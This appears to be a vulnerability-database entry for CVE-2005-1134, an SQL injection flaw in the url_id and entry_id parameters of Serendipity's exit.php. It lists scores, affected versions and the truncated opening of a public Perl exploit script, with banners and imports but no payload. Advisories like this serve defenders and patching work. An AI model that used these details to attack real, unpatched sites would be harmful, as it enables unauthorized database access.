7.5
CVSSv2

CVE-2005-1134

Published: 13/04/2005 Updated: 11/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in exit.php for Serendipity 0.8 and previous versions allows remote malicious users to execute arbitrary SQL commands via the (1) url_id or (2) entry_id parameters.

Vulnerable Product Search on Vulmon Subscribe to Product

s9y serendipity 0.5

s9y serendipity 0.8 beta5

s9y serendipity 0.4

s9y serendipity 0.7

s9y serendipity 0.7 beta1

s9y serendipity 0.6 rc1

s9y serendipity 0.5 pl1

s9y serendipity 0.6 pl2

s9y serendipity 0.7 beta3

s9y serendipity 0.8 beta6

s9y serendipity 0.7 beta4

s9y serendipity 0.6 pl1

s9y serendipity 0.3

s9y serendipity 0.6 pl3

s9y serendipity 0.6 rc2

s9y serendipity 0.7 beta2

s9y serendipity 0.7 rc1

s9y serendipity 0.6

Exploits

#!/usr/bin/perl # Serendipity 08beta4 exitphp SQL Injection exploit # (c) ADZ Security Team 2004-2005 # (c) kreon 2005 # adzvoidru/ # kre0n@mailru # Public :) print "\n\n"; print "# Serendipity 08beta4 exitphp SQL Injection exploit\n"; print "# (C) ADZ Security Team 2004-2005\n"; print "# (C) kreon 2005\n"; use IO::Socket; use Getop ...